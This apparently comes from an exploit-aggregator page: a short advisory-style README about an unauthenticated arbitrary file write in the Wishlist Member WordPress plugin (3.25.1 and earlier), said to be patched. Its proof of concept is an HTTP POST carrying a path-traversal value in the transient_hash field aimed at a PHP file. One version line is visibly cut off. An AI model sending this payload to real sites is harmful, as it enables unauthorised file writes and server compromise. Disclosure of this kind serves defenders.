## https://sploitus.com/exploit?id=7C2550AB-0D0A-589C-8530-48A11363C756
## ๐ Overview
This repository contains a detailed analysis of an **Unauthenticated Arbitrary File Write** vulnerability discovered in the **Wishlist Member** plugin for WordPress.
- **Affected Versions**: Version `3.25.1` and all earlier versions (i.e., ` Note: Sensitive paths and server-specific data have been redacted.
---
## ๐งฐ Proof of Concept (POC)
```http
POST /path/to/register HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
transient_hash=../path/to/file.php&orig_email=
```
## Note
This vulnerability was discovered in Wishlist Member version 3.25.1 and earlier.
It has been patched by the vendor in a later release. No CVE ID has been assigned to this issue as of now.